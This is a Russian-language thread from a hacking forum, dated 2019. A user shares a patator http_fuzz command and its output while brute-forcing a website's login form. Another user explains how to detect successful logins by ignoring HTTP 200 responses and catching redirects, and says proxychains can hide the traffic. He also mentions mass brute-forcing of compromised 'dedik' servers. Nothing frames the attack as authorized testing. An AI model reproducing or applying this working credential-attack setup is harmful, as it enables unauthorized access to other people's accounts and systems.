Kali linux проблема с potator

kasperai · 01.08.2019

Пытаюсь за брутфорсить сайт, проблема в том что правельный пароль в словаре не проходит.

Код:

 patator http_fuzz url=https://111.111.111.111:443/cab/auth?return_uri=/cab method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 1=/root/login 0=/root/password follow=1 -x ignore:fgrep='Неверный пароль'
19:25:14 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-08-01 19:25 MSK
19:25:14 patator    INFO -                                                                              
19:25:14 patator    INFO - code size:clen       time | candidate                          |   num | mesg
19:25:14 patator    INFO - -----------------------------------------------------------------------------
19:25:15 patator    INFO - 200  6005:6100      0.046 | 17626225577:9uebrtiueqbrto         |     1 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6003:6098      0.043 | 17626225577:eqbrtijueqrt           |     2 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6005:6100      0.044 | 17626225577:ebrt9uyebr90ku         |     3 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6001:6096      0.050 | 17626225577:iopuywebrt             |     4 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  5997:6092      0.045 | 17626225577:asxdgq                 |     5 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  5994:6089      0.043 | 17626225577:ert                    |     6 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  5997:6092      0.044 | 17626225577:yebrop                 |     7 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6005:6100      0.049 | 17626225577:ywbrikuybri-90         |     9 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6002:6097      0.050 | 17626225577:ybrt-0ywb-0            |    10 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6003:6098      0.043 | 17626225577:ywbreoiyebrw           |     8 | HTTP/1.1 200 OK
19:25:16 patator    INFO - Hits/Done/Skip/Fail/Size: 10/10/0/0/10, Avg: 9 r/s, Time: 0h 0m 1s

sever0ever · 01.08.2019

kasperai сказал(а):

Пытаюсь за брутфорсить сайт, проблема в том что правельный пароль в словаре не проходит.

Код:

patator http_fuzz url=https://111.111.111.111:443/cab/auth?return_uri=/cab method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 1=/root/login 0=/root/password follow=1 -x ignore:fgrep='Неверный пароль'
19:25:14 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-08-01 19:25 MSK
19:25:14 patator    INFO -                                                                          
19:25:14 patator    INFO - code size:clen       time | candidate                          |   num | mesg
19:25:14 patator    INFO - -----------------------------------------------------------------------------
19:25:15 patator    INFO - 200  6005:6100      0.046 | 17626225577:9uebrtiueqbrto         |     1 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6003:6098      0.043 | 17626225577:eqbrtijueqrt           |     2 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6005:6100      0.044 | 17626225577:ebrt9uyebr90ku         |     3 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6001:6096      0.050 | 17626225577:iopuywebrt             |     4 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  5997:6092      0.045 | 17626225577:asxdgq                 |     5 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  5994:6089      0.043 | 17626225577:ert                    |     6 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  5997:6092      0.044 | 17626225577:yebrop                 |     7 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6005:6100      0.049 | 17626225577:ywbrikuybri-90         |     9 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6002:6097      0.050 | 17626225577:ybrt-0ywb-0            |    10 | HTTP/1.1 200 OK
19:25:15 patator    INFO - 200  6003:6098      0.043 | 17626225577:ywbreoiyebrw           |     8 | HTTP/1.1 200 OK
19:25:16 patator    INFO - Hits/Done/Skip/Fail/Size: 10/10/0/0/10, Avg: 9 r/s, Time: 0h 0m 1s

Просто поменяй запрос c ignore:fgrep='Неверный пароль' на ignore:code=200 или скидывай весь Headers если тебе так важно именно через ignore:fgrep. Логин и пас добавь расширение .txt, проверь нужны ли куки или токены при отправке запроса. Если не сработает через ignore:code=200, проверь на наличие всех зависимостей.

kasperai · 01.08.2019

А можно не через ignore:fgrep ?

sever0ever · 01.08.2019

kasperai сказал(а):
А можно не через ignore:fgrep ?

Да там вообщем-то много вариантов, как можно, но самый эффективный и простой конкретно в твоем случае ignore:code=200 , то есть пататор будет игнорировать все запросы с кодом 200 и откликнется, когда код запроса сменится, при удачном подборе в таком случае чаще всего будешь получать код запроса 3хх, то есть переход на другой url

kasperai · 02.08.2019

Ещё хотел спросить, можно ли использовать в связки с proxychains

sever0ever · 03.08.2019

kasperai сказал(а):
Ещё хотел спросить, можно ли использовать в связки с proxychains

Можно, но это скажется на эффективности, процент потери гудов увеличится. В случае массового брута дедиков это не такая уж проблема, но если цель единичная, то есть шанс пропустить нужный гуд.

Все сервисы Codeby

Поиск

Поиск

Kali linux проблема с potator

kasperai

Active member

sever0ever

kasperai

Active member

sever0ever

kasperai

Active member

sever0ever

Похожие темы

Курс AD